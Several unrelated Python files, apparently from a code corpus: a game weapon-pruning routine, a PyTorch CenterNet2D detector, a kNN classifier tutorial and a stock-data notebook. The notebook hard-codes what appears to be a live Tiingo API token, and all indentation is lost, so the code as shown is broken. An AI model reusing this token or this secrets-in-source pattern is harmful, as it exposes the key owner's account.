# So, we will only continue now only if both weapons have the same set bonus.
if w1.set_bonus is not w2.set_bonus:
return True
# We don't deal with is_raw. That has already been dealt with for us.
# This one is also similar to stage 1, but the other way around :)
if any((s1 > s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):
return True
# STAGE 3: The two weapons are effectively the same.
return None
# Returns a list of tuples (weapon, augments_tracker, upgrades_tracker)
def get_pruned_weapon_combos(weapon_class, health_regen_minimum):
weapon_combinations = []
for (_, weapon) in weapon_db.items():
if weapon.type is not weapon_class:
continue # We ignore weapons that don't match our desired weapon class.
for augments_tracker in WeaponAugmentTracker.get_maximized_trackers(weapon, health_regen_minimum=health_regen_minimum):
for upgrades_tracker in WeaponUpgradeTracker.get_maximized_trackers_pruned(weapon):
precalculated_values = calculate_final_weapon_values(weapon, augments_tracker, upgrades_tracker)
weapon_combinations.append(((weapon, augments_tracker, upgrades_tracker), precalculated_values))
# Now, we prune!
def left_supercedes_right(weapon1, weapon2):
return _weapon_combo_supercedes(weapon1[1], weapon2[1])
if __debug__:
fordump_before = weapon_combinations
progress = ExecutionProgress(f"PRUNING WEAPONS -", len(weapon_combinations), granularity=1000)
weapon_combinations = prune_by_superceding(weapon_combinations, left_supercedes_right, \
execute_per_iteration=lambda : progress.update_and_log_progress(logger))
if __debug__:
fordump_after = weapon_combinations
dump_pruned_weapon_combos(fordump_before, fordump_after, left_supercedes_right)
weapon_combinations = [x[0] for x in weapon_combinations]
return weapon_combinations
def get_weapon_config_humanreadable(linebegin, weapon, weapon_augments_tracker, weapon_upgrades_tracker):
buf = []
buf.append(linebegin + weapon.name)
buf.append("")
for (augment, level) in weapon_augments_tracker.get_config():
buf.append(f"{linebegin}{augment.name} {level}")
# TODO: Let the tracker print itself.
if isinstance(weapon_upgrades_tracker, IBCWeaponUpgradeTracker):
for (stage, upgrade) in enumerate(weapon_upgrades_tracker.get_config()):
buf.append(f"{linebegin}Custom Upgrade: {upgrade.name} {stage+1}")
elif isinstance(weapon_upgrades_tracker, SafiWeaponUpgrades):
for (upgrade, level) in weapon_upgrades_tracker.get_config():
buf.append(f"{linebegin}Safi Awakening: {upgrade.name} {level}")
return "\n".join(buf)
|
<filename>nets/centernet2d.py<gh_stars>10-100
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils.improc
import utils.misc
import utils.basic
import utils.geom
import utils.samp
import numpy as np
from utils.basic import print_
def compute_seg_loss(pred, pos, neg, balanced=True):
pos = pos.clone().reshape(-1)
neg = neg.clone().reshape(-1)
pred = pred.reshape(-1)
label = pos*2.0 - 1.0
a = -label * pred
b = F.relu(a)
loss = b + torch.log(torch.exp(-b)+torch.exp(a-b))
mask_ = (pos+neg>0.0).float()
if balanced:
pos_loss = utils.basic.reduce_masked_mean(loss, pos)
neg_loss = utils.basic.reduce_masked_mean(loss, neg)
balanced_loss = pos_loss + neg_loss
return balanced_loss
else:
loss_pos = loss[pos > 0]
loss_neg = loss[neg > 0]
loss = torch.cat([loss_pos, loss_neg], dim=0).mean()
return loss
def balanced_ce_loss(pred, gt, valid=None):
# pred is B x 1 x Y x X
pos = (gt > 0.95).float()
neg = (gt < 0.05).float()
if valid is None:
valid = torch.ones_like(pos)
label = pos*2.0 - 1.0
a = -label * pred
b = F.relu(a)
loss = b + torch.log(torch.exp(-b)+torch.exp(a-b))
pos_loss = utils.basic.reduce_masked_mean(loss, pos*valid)
neg_loss = utils.basic.reduce_masked_mean(loss, neg*valid)
balanced_loss = pos_loss + neg_loss
return balanced_loss
class ResidualBlock(nn.Module):
def __init__(self, in_planes, planes, norm_fn='group', stride=1):
super(ResidualBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, padding=1, stride=stride)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
self.relu = nn.ReLU(inplace=True)
num_groups = planes // 8
if norm_fn == 'group':
self.norm1 = nn.GroupNorm(num_groups=num_groups, num_channels=planes)
self.norm2 = nn.GroupNorm(num_groups=num_groups, num_channels=planes)
if not stride == 1:
self.norm3 = nn.GroupNorm(num_groups=num_groups, num_channels=planes)
elif norm_fn == 'batch':
self.norm1 = nn.BatchNorm2d(planes)
self.norm2 = nn.BatchNorm2d(planes)
if not stride == 1:
self.norm3 = nn.BatchNorm2d(planes)
elif norm_fn == 'instance':
self.norm1 = nn.InstanceNorm2d(planes)
self.norm2 = nn.InstanceNorm2d(planes)
if not stride == 1:
self.norm3 = nn.InstanceNorm2d(planes)
elif norm_fn == 'none':
self.norm1 = nn.Sequential()
self.norm2 = nn.Sequential()
if not stride == 1:
self.norm3 = nn.Sequential()
if stride == 1:
self.downsample = None
else:
self.downsample = nn.Sequential(
nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride), self.norm3)
def forward(self, x):
y = x
y = self.relu(self.norm1(self.conv1(y)))
y = self.relu(self.norm2(self.conv2(y)))
if self.downsample is not None:
x = self.downsample(x)
return self.relu(x+y)
class BasicEncoder(nn.Module):
def __init__(self, input_dim=3, stride=8, output_dim=128, norm_fn='batch', dropout=0.0):
super(BasicEncoder, self).__init__()
self.norm_fn = norm_fn
self.stride = stride
if self.norm_fn == 'group':
self.norm1 = nn.GroupNorm(num_groups=8, num_channels=64)
elif self.norm_fn == 'batch':
self.norm1 = nn.BatchNorm2d(64)
elif self.norm_fn == 'instance':
self.norm1 = nn.InstanceNorm2d(64)
elif self.norm_fn == 'none':
self.norm1 = nn.Sequential()
self.conv1 = nn.Conv2d(input_dim, 64, kernel_size=7, stride=2, padding=3)
self.relu1 = nn.ReLU(inplace=True)
self.in_planes = 64
self.layer1 = self._make_layer(64, stride=1)
self.layer2 = self._make_layer(96, stride=2)
self.layer3 = self._make_layer(128, stride=2)
self.layer4 = self._make_layer(128, stride=2)
self.conv2 = nn.Conv2d(128+128+96, output_dim, kernel_size=1)
# # output convolution
# if self.stride==4:
# # self.conv2 = nn.Conv2d(128+96, output_dim, kernel_size=1)
# else:
# self.conv2 = nn.Conv2d(128, output_dim, kernel_size=1)
self.dropout = None
if dropout > 0:
self.dropout = nn.Dropout2d(p=dropout)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.InstanceNorm2d, nn.GroupNorm)):
if m.weight is not None:
nn.init.constant_(m.weight, 1)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
def _make_layer(self, dim, stride=1):
layer1 = ResidualBlock(self.in_planes, dim, self.norm_fn, stride=stride)
layer2 = ResidualBlock(dim, dim, self.norm_fn, stride=1)
# layer3 = ResidualBlock(dim, dim, self.norm_fn, stride=1)
# layers = (layer1, layer2, layer3)
layers = (layer1, layer2)
self.in_planes = dim
return nn.Sequential(*layers)
def forward(self, x):
_, _, H, W = x.shape
x = self.conv1(x)
x = self.norm1(x)
x = self.relu1(x)
x = self.layer1(x)
x = self.layer2(x)
y = self.layer3(x)
z = self.layer4(y)
# print('x', x.shape)
# print('y', y.shape)
# print('z', z.shape)
x = F.interpolate(x, (H//self.stride, W//self.stride), mode='bilinear', align_corners=True)
y = F.interpolate(y, (H//self.stride, W//self.stride), mode='bilinear', align_corners=True)
z = F.interpolate(z, (H//self.stride, W//self.stride), mode='bilinear', align_corners=True)
x = self.conv2(torch.cat([x,y,z], dim=1))
if self.training and self.dropout is not None:
x = self.dropout(x)
return x
def _topk(objectness, K=10):
B, C, Z, X = list(objectness.shape)
assert(C==1)
scorelist, indlist = torch.topk(objectness.view(B, C, -1), K)
# indlist_z = indlist // (X)
indlist_z = torch.div(indlist, X, rounding_mode='trunc')
indlist_x = indlist % (X)
scorelist = scorelist.reshape(B, K)
indlist_z = indlist_z.reshape(B, K)
indlist_x = indlist_x.reshape(B, K)
xzlist = torch.stack([indlist_x, indlist_z], dim=2).float()
return scorelist, xzlist
def _nms(heat, kernel=11):
pad = (kernel - 1) // 2
hmax = F.max_pool2d(
heat, (kernel, kernel), stride=1, padding=pad)
keep = (hmax == heat).float() #* (hmax > 0.9).float()
return heat * keep
class Centernet2d(nn.Module):
def _sigmoid(self, x):
y = torch.clamp(x.sigmoid_(), min=1e-4, max=1-1e-4)
return y
def __init__(self, Y=32, K=10, show_thresh=0.5, stride=8):
super(Centernet2d, self).__init__()
print('Centernet2d...')
self.stride = stride
Y_ = Y//self.stride
self.Y = Y
self.Y_ = Y_
self.K = K
self.thresh = show_thresh # only show/return boxes with this conf
self.num_rot_bins = 16
self.heading_unaware = True
if self.heading_unaware:
# for rotation, i have decided to be heading-unaware
# so, 0 and 180 are treated as equivalent
bin_angles = np.linspace(0, np.pi, self.num_rot_bins, endpoint=False)
bin_complements = bin_angles + np.pi
all_bins = np.concatenate([bin_angles, bin_complements], axis=0)
all_inds = np.concatenate([np.arange(self.num_rot_bins), np.arange(self.num_rot_bins)], axis=0)
else:
all_bins = np.linspace(0, np.pi*2, self.num_rot_bins, endpoint=False)
all_inds = np.arange(self.num_rot_bins)
bin_angles = all_bins
self.bin_angles = torch.from_numpy(bin_angles).float().cuda()
self.all_bins = torch.from_numpy(all_bins).float().cuda()
self.all_inds = torch.from_numpy(all_inds).long().cuda()
obj_channels = 1
size_channels = 3
offset_channels = 4
rot_channels = self.num_rot_bins # just ry
seg_channels = Y_
self.output_channels = obj_channels + size_channels + offset_channels + rot_channels + seg_channels
self.net = BasicEncoder(input_dim=Y, stride=stride, output_dim=self.output_channels, norm_fn='instance', dropout=0)
self.mse = torch.nn.MSELoss(reduction='none')
self.smoothl1 = torch.nn.SmoothL1Loss(reduction='none')
def balanced_mse_loss(self, pred, gt, valid=None):
# pos_inds = gt.eq(1).float()
# neg_inds = gt.lt(1).float()
pos_mask = gt.gt(0.5).float()
neg_mask = gt.lt(0.5).float()
# utils.basic.print_stats('pos_mask', pos_mask)
# utils.basic.print_stats('neg_mask', neg_mask)
# utils.basic.print_stats('pred', pred)
# utils.basic.print_stats('gt', gt)
if valid is None:
valid = torch.ones_like(pos_mask)
mse_loss = self.mse(pred, gt)
pos_loss = utils.basic.reduce_masked_mean(mse_loss, pos_mask*valid)
neg_loss = utils.basic.reduce_masked_mean(mse_loss, neg_mask*valid)
loss = (pos_loss + neg_loss)*0.5
return loss
def compute_rot_loss(self, rot_prob, rot_g, valid):
# rot_prob is B x N x self.rot_bins
# rot_g is B x N, with angles in radians
# valid is B x N
B, N = list(rot_g.shape)
rot_prob = rot_prob.reshape(B*N, self.num_rot_bins)
valid = valid.reshape(B*N)
rot_g = rot_g.reshape(B*N, 1)
# i need to assign rot_g into bins
dist = utils.geom.angular_l1_dist(rot_g, self.all_bins.reshape(1, -1))
# this is B*N x num_rot_bins
min_inds = torch.argmin(dist, dim=1)
# this is B*N and long
# for safety, let's not parallelize the gather here
labels = torch.zeros(B*N).long().cuda()
for b in list(range(B*N)):
labels[b] = self.all_inds[min_inds[b]]
# print('labels', labels.detach().cpu().numpy())
# print('rot_prob', rot_prob.shape)
loss_vec = F.cross_entropy(rot_prob, labels, reduction='none')
# rather than take a straight mean, we will balance across classes
losses = []
for cls in list(range(self.num_rot_bins)):
mask = (labels==cls).float()
cls_loss = utils.basic.reduce_masked_mean(loss_vec, mask*valid)
if torch.sum(mask) >= 1:
# print('adding loss for rot bin %d' % cls)
losses.append(cls_loss)
total_loss = torch.mean(torch.stack(losses))
return total_loss
def forward(self, occ_feat, lrtlist_cam_g=None, scorelist_g=None, center_g=None, valid_g=None, pos_mem=None, neg_mem=None, vox_util=None, sw=None, force_export_boxlist=False, K=None):
total_loss = torch.tensor(0.0).cuda()
occ_mem = occ_feat.permute(0, 2, 1, 3).unsqueeze(1)
B, Y, Z, X = list(occ_feat.shape)
out_feat = self.net(occ_feat)
# print('out_feat', out_feat.shape)
Z8 = Z//self.stride
X8 = X//self.stride
Y8 = Y//self.stride
# pred = out_feat.reshape(B, self.Y8, self.output_channels, Z8, X8).permute(0, 2, 3, 1, 4) # B, C, Z, Y, X
# print('pred', pred.shape)
pred = out_feat.reshape(B, self.output_channels, Z8, X8) # B, C, Z, X
# dy, dx = utils.basic.gradient2d(pred, absolute=True)
# smooth_loss = torch.mean(dy+dx)
# total_loss += smooth_loss*0.01
center_e = pred[:,0:1]
center_e_sig = torch.sigmoid(center_e)
size_e = F.softplus(pred[:,1:4]) + 0.01
offset_e = pred[:, 4:7]
ycoord_e = pred[:, 7:8]
ry_e = pred[:, 8:8+self.num_rot_bins]
seg_e = pred[:, 8+self.num_rot_bins:].reshape(B, 1, Y8, Z8, X8).permute(0, 1, 3, 2, 4)
# print('center_e', center_e.shape)
# print('center_g', center_g.shape)
if lrtlist_cam_g is not None:
# assume other _g tensors are present
B2, N, D = list(lrtlist_cam_g.shape)
assert(B==B2)
assert(D==19)
seg_loss = compute_seg_loss(seg_e, pos_mem, neg_mem, balanced=True)
total_loss = utils.misc.add_loss('center2d/seg_loss', total_loss, seg_loss, 1.0, sw)
lrtlist_mem_g = vox_util.apply_mem_T_ref_to_lrtlist(lrtlist_cam_g, Z8, Y8, X8, assert_cube=False)
prob_loss = self.balanced_mse_loss(center_e_sig, center_g, valid_g)
total_loss = utils.misc.add_loss('center2d/prob_loss', total_loss, prob_loss, 1.0, sw)
clist_g = utils.geom.get_clist_from_lrtlist(lrtlist_mem_g)
# clist_g is B x N x 3
sizelist_g, rtlist_cam_g = utils.geom.split_lrtlist(lrtlist_cam_g) # note these are from cam, unlike centers
# sizelist_g, rtlist_cam_g = utils.geom.split_lrtlist(lrtlist_mem_g)
# print_('rylist_g', rylist_g)
rlist_, tlist_ = utils.geom.split_rt(rtlist_cam_g.reshape(B*N, 4, 4))
# compute ry using trigonometry
x_vec = torch.zeros((B*N, 3), dtype=torch.float32, device=clist_g.device)
x_vec[:, 2] = 1 # 0,0,1
x_rot = torch.matmul(rlist_, x_vec.unsqueeze(2)).squeeze(2)
rylist_g = torch.atan2(x_rot[:,0],x_rot[:,2]).reshape(B, N)
sizelist_e = utils.samp.bilinear_sample2d(size_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
sizelist_diff = torch.sum(self.smoothl1(sizelist_e, sizelist_g), dim=2)
# this is B x N
size_loss = utils.basic.reduce_masked_mean(sizelist_diff, scorelist_g)
total_loss = utils.misc.add_loss('center2d/size_loss', total_loss, size_loss, 1.0, sw)
ycoordlist_e = utils.samp.bilinear_sample2d(ycoord_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
ycoordlist_g = clist_g[:,:,1:2]
ycoordlist_diff = torch.sum(self.smoothl1(ycoordlist_e, ycoordlist_g), dim=2)
ycoord_loss = utils.basic.reduce_masked_mean(ycoordlist_diff, scorelist_g)
total_loss = utils.misc.add_loss('center2d/ycoord_loss', total_loss, ycoord_loss, 1.0, sw)
offsetlist_e = utils.samp.bilinear_sample2d(offset_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
offsetlist_g = clist_g - torch.round(clist_g) # get the decimal part
offsetlist_diff = torch.sum(self.smoothl1(offsetlist_e, offsetlist_g), dim=2)
offset_loss = utils.basic.reduce_masked_mean(offsetlist_diff, scorelist_g)
total_loss = utils.misc.add_loss('center2d/offset_loss', total_loss, offset_loss, 1.0, sw)
rylist_e = utils.samp.bilinear_sample2d(ry_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
ry_loss = self.compute_rot_loss(rylist_e, rylist_g, scorelist_g)
total_loss = utils.misc.add_loss('center2d/ry_loss', total_loss, ry_loss, 1.0, sw)
# now, let's convert the estimates into discrete boxes
# this means: extract topk peaks from the centerness map,
# and at those locations, extract the rotation and size estimates
center_e_clean = center_e_sig.clone()
center_e_clean = _nms(center_e_clean, kernel=15)
if sw is not None:
sw.summ_oned('center2d/center_e_clean', center_e_clean, norm=False)
scorelist_e, xzlist_mem_e = _topk(center_e_clean, K=self.K)
sizelist_e = utils.samp.bilinear_sample2d(size_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
offsetlist_e = utils.samp.bilinear_sample2d(offset_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
ycoordlist_e = utils.samp.bilinear_sample2d(ycoord_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
rylist_e = utils.samp.bilinear_sample2d(ry_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
# note that the predicted ycoord is in mem coords
xyzlist_mem_e = torch.stack([xzlist_mem_e[:,:,0],
ycoordlist_e[:,:,0],
xzlist_mem_e[:,:,1]], dim=2)
xyzlist_cam_e = vox_util.Mem2Ref(xyzlist_mem_e, Z8, Y8, X8, assert_cube=False)
# # fancy new idea:
# # at these peaks, apply another loss, using the nearest gt
# # e.g., we would like offsets away from the object to point to the object
# if (lrtlist_mem_g is not None):
# extra_size_loss = 0.0
# extra_offset_loss = 0.0
# extra_rot_loss = 0.0
# normalizer = 0.0
# for b in list(range(B)):
# for k in list(range(self.K)):
# xyz_e = xyzlist_mem_e[b:b+1, k]
# size_e = sizelist_e[b:b+1, k]
# offset_e = offsetlist_e[b:b+1, k]
# # these are 1 x 3
# # rx_e = rxlist_e[b:b+1, k]
# ry_e = rylist_e[b:b+1, k]
# # these are 1 x num_rot_bins
# # rz = rzlist_e[b:b+1, k]
# # these are 1 x 1
# xyz_g = clist_g[b:b+1]
# score_g = scorelist_g[b:b+1]
# xyz_g[score_g < 1.0] = 100000 # discard for mindist
# # this is 1 x N x 3
# dist = utils.basic.sql2_on_axis(xyz_g - xyz_e.unsqueeze(1), 2)
# # this is 1 x N
# ind = torch.argmin(dist, dim=1).squeeze()
# # print('ind', ind.detach().cpu().numpy(), ind.shape)
# xyz_g = clist_g[b:b+1,ind]
# size_g = sizelist_g[b:b+1,ind]
# score_g = scorelist_g[b:b+1,ind]
# mindist = dist[:,ind]
# # only proceed if the nn is valid, and not too far away
# if score_g.squeeze() == 1.0 and mindist.squeeze() < 8.0:
# # offset_g = offsetlist_g[b:b+1,ind]
# # for offset, we actually need to recompute
# offset_g = xyz_g - xyz_e
# # rx_g = rxlist_g[b:b+1,ind]
# ry_g = rylist_g[b:b+1,ind]
# # all the tensors of interest are 1x3, or 1xnum_bins for rots
# # extra_rot_loss += 0.5 * self.compute_rot_loss(rx_e.unsqueeze(1), rx_g.unsqueeze(1), torch.ones_like(rx_g.unsqueeze(1)))
# # extra_rot_loss += 0.5 * self.compute_rot_loss(ry_e.unsqueeze(1), ry_g.unsqueeze(1), torch.ones_like(ry_g.unsqueeze(1)))
# extra_size_loss += torch.mean(torch.sum(self.smoothl1(size_e, size_g), dim=1))
# extra_offset_loss += torch.mean(torch.sum(self.smoothl1(offset_e, offset_g), dim=1))
# extra_rot_loss += self.compute_rot_loss(ry_e.unsqueeze(1), ry_g.unsqueeze(1), torch.ones_like(ry_g.unsqueeze(1)))
# normalizer += 1
# else:
# # print('discarding; mindist:', mindist.squeeze().detach().cpu().numpy())
# pass
# if normalizer > 0:
# total_loss = utils.misc.add_loss('center2d/extra_size_loss', total_loss, extra_size_loss/normalizer, 0.1, sw)
# total_loss = utils.misc.add_loss('center2d/extra_offset_loss', total_loss, extra_offset_loss/normalizer, 0.1, sw)
# total_loss = utils.misc.add_loss('center2d/extra_rot_loss', total_loss, extra_rot_loss/normalizer, 0.1, sw)
if (sw is not None and sw.save_this) or force_export_boxlist:
# xyzlist_cam_e = vox_util.Mem2Ref(xyzlist_mem_e + offsetlist_e, Z, Y, X, assert_cube=False)
boxlist = scorelist_e.new_zeros((B, self.K, 9))
scorelist = scorelist_e.new_zeros((B, self.K))
for b in list(range(B)):
boxlist_b = []
scorelist_b = []
for k in list(range(self.K)):
score = scorelist_e[b:b+1, k]
# print('score', score.shape)
# print('score', score.squeeze().shape)
# let's call it a real object
if score.squeeze() > self.thresh:
# xyz = xyzlist_mem_e[b:b+1, k]
xyz = xyzlist_cam_e[b:b+1, k] # 1,3
size = sizelist_e[b:b+1, k] # 1,3
ry = rylist_e[b:b+1, k] # 1,num_rot_bins
# i need to convert this into an actual rot
ry = ry.squeeze()
ry_ind = torch.argmax(ry)
ry = self.bin_angles[ry_ind].reshape(1)
rz = torch.zeros_like(ry)
rx = torch.zeros_like(ry)
rot = torch.stack([rx, ry, rz], dim=1) # 1, 3
box = torch.cat([xyz, size, rot], dim=1)
boxlist_b.append(box)
scorelist_b.append(score)
if len(boxlist_b) > 0:
boxlist_b = torch.stack(boxlist_b, dim=1) # 1 x ? x 3
scorelist_b = torch.stack(scorelist_b, dim=1) # 1 x ? x 1
boxlist_b = torch.cat((boxlist_b, torch.zeros([1, self.K, 9]).cuda()), dim=1)
scorelist_b = torch.cat((scorelist_b, torch.zeros([1, self.K]).cuda()), dim=1)
boxlist_b = boxlist_b[:, :self.K]
scorelist_b = scorelist_b[:, :self.K]
else:
boxlist_b = torch.zeros([1, self.K, 9]).cuda()
scorelist_b = torch.zeros([1, self.K]).cuda()
boxlist[b:b+1] = boxlist_b
scorelist[b:b+1] = scorelist_b
lrtlist_cam = utils.geom.convert_boxlist_to_lrtlist(boxlist)
if sw is not None and sw.save_this:
sw.summ_lrtlist_bev(
'center2d/lrtlist_mem_e',
occ_mem,
lrtlist_cam[0:1],
scorelist[0:1], # scores
torch.ones(1,self.K).long().cuda(), # tids
vox_util,
already_mem=False)
sw.summ_lrtlist_bev(
'center2d/lrtlist_mem_g',
occ_mem,
lrtlist_cam_g[0:1],
scorelist_g[0:1], # scores
torch.ones_like(scorelist_g).long(), # tids
vox_util,
already_mem=False)
else:
lrtlist_cam = None
scorelist = None
if sw is not None and sw.save_this:
sw.summ_oned('center2d/center_e_sig', center_e_sig, norm=False)
seg_e_sig = F.interpolate(torch.sigmoid(seg_e), scale_factor=self.stride)
pos_e = (seg_e_sig > 0.8).float()
neg_e = (seg_e_sig < 0.2).float()
# show the occ estimates
pos_e = pos_e * occ_mem
neg_e = neg_e * occ_mem
pos_bev = torch.max(pos_e, dim=3)[0]
neg_bev = torch.max(neg_e, dim=3)[0]
seg_bev = torch.cat([pos_bev, neg_bev], dim=1)
seg_vis = sw.summ_soft_seg_thr('', seg_bev, colormap='tab10', only_return=True)
occ_vis = sw.summ_occ('', occ_mem, only_return=True)
seg_vis = utils.improc.preprocess_color(seg_vis).cuda()
occ_vis = utils.improc.preprocess_color(occ_vis).cuda()
sw.summ_rgb('center2d/seg_e_on_occ', (occ_vis + seg_vis)/2.0)
sw.summ_oned('center2d/seg_e_sig', torch.mean(seg_e_sig, dim=3), norm=True)
return total_loss, lrtlist_cam, scorelist, seg_e
|
<reponame>Phoenix1327/MLA<filename>kNN/kNNbase.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'Administrator'
from kNN import *
def createDataSet():
group = np.array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])
labels = ['A','A','B','B']
return group, labels
def classify0(inX, dataSet, labels, k):
dataSetSize = dataSet.shape[0]
featureSize = dataSet.shape[1]
diffMat = np.tile(inX, (dataSetSize,1)) - dataSet #dataSetSize * featureSize
sqDiffMat = diffMat**2
sqDistances = sqDiffMat.sum(axis=1)#dataSetSize * 1
distances = sqDistances**0.5
sortedDistIndicies = distances.argsort(axis=None)
classCount = {}
for i in range(k):
voteIlabel = labels[sortedDistIndicies[i]]
classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1
sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
def label2int(label):
if label == 'largeDoses':
return 3
elif label == 'smallDoses':
return 2
else:
return 1
def file2matrix(filename):
fr = open(filename)
dataLines = fr.readlines()
dataSize = len(dataLines)
returnMat = np.zeros((dataSize, 3))
classLabelVector = []
index = 0
for line in dataLines:
line = line.strip()
linelist = line.split('\t')
returnMat[index,:] = linelist[0:3]
classLabelVector.append(label2int(linelist[-1]))
index += 1
return returnMat, classLabelVector
def plt3DData(mat, labelvector, norm=False):
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for c, m, classidx, label in [('r', 'o', 1, 'didntLike'), ('b', '^', 2, 'smallDoses'), ('g', 's', 3, 'largeDoses')]:
idx = [i for i,a in enumerate(labelvector) if a==classidx]
features = mat[idx][:]
xs = features[:,0]
ys = features[:,1]
zs = features[:,2]
if norm:
xs = (xs - xs.min(0))/(xs.max(0) - xs.min(0))
ys = (ys - ys.min(0))/(ys.max(0) - ys.min(0))
zs = (zs - zs.min(0))/(zs.max(0) - zs.min(0))
ax.scatter(xs, ys, zs, c=c, marker=m, label=c+': '+label)
ax.set_xlabel('每年获得的飞行常客里程数')
ax.set_ylabel('每周消费的冰激凌公升数')
ax.set_zlabel('玩视频游戏所耗时间百分比')
plt.legend()
plt.grid(True)
plt.show()
def autoNorm(dataSet):
minVals = dataSet.min(0)
maxVals = dataSet.max(0)
ranges = maxVals - minVals
normDataSet = np.zeros(dataSet.shape)
dataSize = dataSet.shape[0]
normDataSet = dataSet - np.tile(minVals, (dataSize,1))
normDataSet = normDataSet / np.tile(ranges, (dataSize,1))
return normDataSet, ranges, minVals
def datingClassTest(k, hoRatio, datingDataMat, datingLabels):
normMat, ranges, minVals = autoNorm(datingDataMat)
dataSize = normMat.shape[0]
numTestVecs = int(dataSize * hoRatio)
errorCount = 0.0
for i in range(numTestVecs):
Result = classify0(normMat[i,:], normMat[numTestVecs:,:],\
datingLabels[numTestVecs:],k)
print("the classifier came back with: %d, the real answer is: %d"\
% (Result, datingLabels[i]))
if not Result == datingLabels[i]:
errorCount += 1
print("the total error rate is: %0.2f%%" % (errorCount/float(numTestVecs)*100))
def img2vector(filename):
fr = open(filename)
dataLines = fr.readlines()
datastr = ''
for line in dataLines:
datastr += line.strip()
datalist = list(datastr)
datalist = list(map(int, datalist))
return np.asarray(datalist).reshape(1,len(datalist))
def handwritingClassTest(datapath, k=3):
hwLabels = []
abspath = os.path.abspath('.')
trainData_dirname = 'trainingDigits'
testData_dirname = 'testDigits'
trainfilepath = os.path.join(datapath, trainData_dirname)
trainingFileList = os.listdir(trainfilepath)
size = len(trainingFileList)
trainingMat = np.zeros((size,1024))
for i in range(size):
fileNameStr = trainingFileList[i]
classNumstr = int(fileNameStr.split('_')[0])
hwLabels.append(classNumstr)
trainingMat[i,:] = img2vector(os.path.join(trainfilepath, fileNameStr))
testfilepath = os.path.join(datapath, testData_dirname)
testFileList = os.listdir(testfilepath)
errorCount = 0.0
sizeTest = len(testFileList)
for i in range(sizeTest):
fileNameStr = testFileList[i]
classNumstr = int(fileNameStr.split('_')[0])
vecUnderTest = img2vector(os.path.join(testfilepath, fileNameStr))
Result = classify0(vecUnderTest, trainingMat, hwLabels, k)
print('the classfier came back with: %d, the real answer is: %d'\
% (Result, classNumstr))
if not Result == classNumstr:
errorCount += 1.0
print("the total error rate is: %0.2f%%" % (errorCount/float(sizeTest)*100))
|
<gh_stars>1-10
#!/usr/bin/env python
# coding: utf-8
# In[1]:
#Here add a description
# In[2]:
'''
Importing all the needed librairies
'''
#Data Structure, scientific computing and technical computing.
import numpy as np
import pandas as pd
import pandas_datareader.data as web # pip install pandas_datareader
#Dataframe
import pandas_datareader as pdr
#Scipy: scientific computing
import scipy
from scipy.spatial.distance import pdist, squareform
from scipy.spatial import distance_matrix
from scipy import stats
#Visualization
import plotly.graph_objs as go
import matplotlib.pyplot as plt
import seaborn as sns
# machine learning library for the Python programming language.
from sklearn.neighbors import KernelDensity
#Dataset
import yfinance as yf #pip install yfinance
#Date formatting
#Today's date
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta
#Statistics
import scipy
#Past six month function
def past_six_month_date():
#librairies
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta
#emptylist
mylist = []
#Processing six months back
sixp = date.today() - relativedelta(months=+6)
mylist.append(sixp)
return f"{mylist[0]:%Y-%m-%d}"
six_months_ago = past_six_month_date()
today = date.today()
#For printing results
#print("Today's date:", today)
#print("Exactly 6 months date:", six_months_ago)
# ### Implementing tiingo.com:
# A financial research platform dedicated to creating innovative financial tools for all, while adopting the motto, **"Actively Do Good"**.
#
# In[3]:
Login = 'bunster'
pw = '<PASSWORD>'
start = six_months_ago
end = today
TICKERS = [ 'AAPL','MSFT', 'Goog', 'AMZN', 'TSLA']
apiURL= 'https://api.tiingo.com/documentation/end-of-day'
token = '2d10bb042e786244063efc000e6dc15e79b07274'
# In[4]:
def get_adjusted_close(ticker, start, end, token):
import pandas_datareader as pdr
df = pdr.get_data_tiingo(ticker, start, end, api_key=token)
return df
# In[5]:
def returned_dataFrame(list_of_frame):
df = pd.concat(list_of_frame)
return df
# In[6]:
def build_dataset(ticker):
from tiingo import TiingoClient
config = {}
# To reuse the same HTTP Session across API calls (and have better performance),
config['session'] = True
# If you don't have your API key as an environment variable,
# pass it in via a configuration dictionary.
config['api_key'] = "2d10bb042e786244063efc000e6dc15e79b07274"
# Initialize
client = TiingoClient(config)
df = client.get_dataframe(ticker, startDate = six_months_ago, endDate= today, frequency='daily', metric_name=None)
return df
# In[7]:
#df = build_dataset('AAPL')
# In[8]:
TICKERS_Frames = ['AAPL', 'MSFT', 'Goog', 'AMZN', 'TSLA']
AAPL = build_dataset(TICKERS_Frames[0])
MSFT = build_dataset(TICKERS_Frames[1])
Goog = build_dataset(TICKERS_Frames[2])
AMZN = build_dataset(TICKERS_Frames[3])
TSLA = build_dataset(TICKERS_Frames[4])
AAPL['Ticker']= 'AAPL'
MSFT['Ticker']= 'MSFT'
Goog['Ticker']= 'Goog'
AMZN['Ticker']= 'AMZN'
TSLA['Ticker']= 'TSLA'
Frames = [ AAPL, MSFT, Goog, AMZN, TSLA]
df = pd.concat(Frames)
# In[ ]:
#
#
